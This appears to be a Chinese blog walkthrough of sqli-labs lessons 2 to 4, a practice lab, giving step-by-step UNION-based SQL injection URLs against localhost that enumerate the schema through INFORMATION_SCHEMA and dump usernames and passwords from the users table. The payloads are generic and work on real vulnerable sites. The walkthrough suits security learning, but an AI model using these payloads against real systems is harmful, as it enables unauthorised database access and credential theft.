zoukankan      html  css  js  c++  java

  • sqli-labs-master 第二关+第三关+第四关

    sqli-labs-master 第二关+第三关+第四关

    实验2

    1. 判断注入点
    http://localhost/sql/Less-2/?id=1
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到数字里
    2. 判断ID类型
    http://localhost/sql/Less-2/?id=0 and 1 = 1
显示正常,我们可以知道ID类型是数字类型
    3. 猜测匹配列数
    http://localhost/sql/Less-1/?id=0 UNION SELECT 1,2,3 %23
匹配成功,我们知道列数是3
    4. 获取数据库信息
    通过查询我们知道数据库名和管理员用户名
http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), user() %23
    5.猜测表名
    通过查询我们知道了用户表名为users
http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = 'security' limit 3,1 %23
    6.查找我们想知道的列
    http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = 'security' And Table_Name = 'users' limit 0,1 %23
    7.爆库
    http://localhost/sql/Less-2/?id=0 UNION SELECT 1,username, password from users limit 5,1 %23

    实验3

    1. 判断注入点
    http://localhost/sql/Less-3/?id=1') %23
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到('中
    2. 判断ID类型
    http://localhost/sql/Less-3/?id=0') and ('1')=1%23
    3. 猜测匹配列数
    http://localhost/sql/Less-3/?id=0') UNION SELECT 1,2,3  %23
匹配成功,我们知道列数是3
    4. 获取数据库信息
    通过查询我们知道数据库名和管理员用户名
http://localhost/sql/Less-3/?id=0') UNION SELECT 1,database(), user() %23
    5.猜测表名
    通过查询我们知道了用户表名为users
http://localhost/sql/Less-3/?id=0') UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = 'security' limit 3,1 %23
    6.查找我们想知道的列
    http://localhost/sql/Less-3/?id=0')  UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = 'security' And Table_Name = 'users' limit 0,1 %23
    7.爆库
    http://localhost/sql/Less-3/?id=0') UNION SELECT 1,username, password from users limit 5,1 %23

    实验4

    1. 判断注入点
    http://localhost/sql/Less-4/?id=1"%23
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到("中
    2. 判断ID类型
    http://localhost/sql/Less-4/?id=0") and ("1")=1%23
    3. 猜测匹配列数
    http://localhost/sql/Less-4/?id=0") UNION SELECT 1,2,3  %23
匹配成功,我们知道列数是3
    4. 获取数据库信息
    通过查询我们知道数据库名和管理员用户名
http://localhost/sql/Less-4/?id=0") UNION SELECT 1,database(), user() %23
    5.猜测表名
    通过查询我们知道了用户表名为users
http://localhost/sql/Less-4/?id=0") UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = 'security' limit 3,1 %23
    6.查找我们想知道的列
    http://localhost/sql/Less-4/?id=0")  UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = 'security' And Table_Name = 'users' limit 0,1 %23
    7.爆库
    http://localhost/sql/Less-4/?id=0") UNION SELECT 1,username, password from users limit 5,1 %23
  • 相关阅读:
    multiprocessing 多进程实现 生产者与消费者模型JoinableQueue
    条件锁condition与Queue()
    threading 官方 线程对象和锁对象以及条件对象condition
    【NOIp训练】—子串查找VII(AC自动机+树链剖分+线段树)
    【NOIp训练】—子串查找VII(AC自动机+树链剖分+线段树)
    【HDU 5628】—Clarke and math(狄利克雷卷积快速幂)
    【HDU 5628】—Clarke and math(狄利克雷卷积快速幂)
    【NOIp2019模拟】题解
    【NOIp2019模拟】题解
    【NOIp2019模拟】题解
  • 原文地址:https://www.cnblogs.com/isChenJY/p/12840102.html
Copyright © 2011-2022 走看看